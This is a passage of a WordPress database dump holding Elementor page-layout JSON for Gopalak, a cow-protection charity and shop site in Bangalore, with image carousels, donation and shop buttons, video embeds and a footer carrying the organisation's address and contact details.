ackground_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(11970,1984,'_elementor_page_assets','a:0:{}'),(11972,1985,'_elementor_edit_mode','builder'),(11973,1985,'_elementor_template_type','wp-page'),(11974,1985,'_elementor_version','3.7.8'),(11975,1985,'_wp_page_template','elementor_canvas'),(11976,1985,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 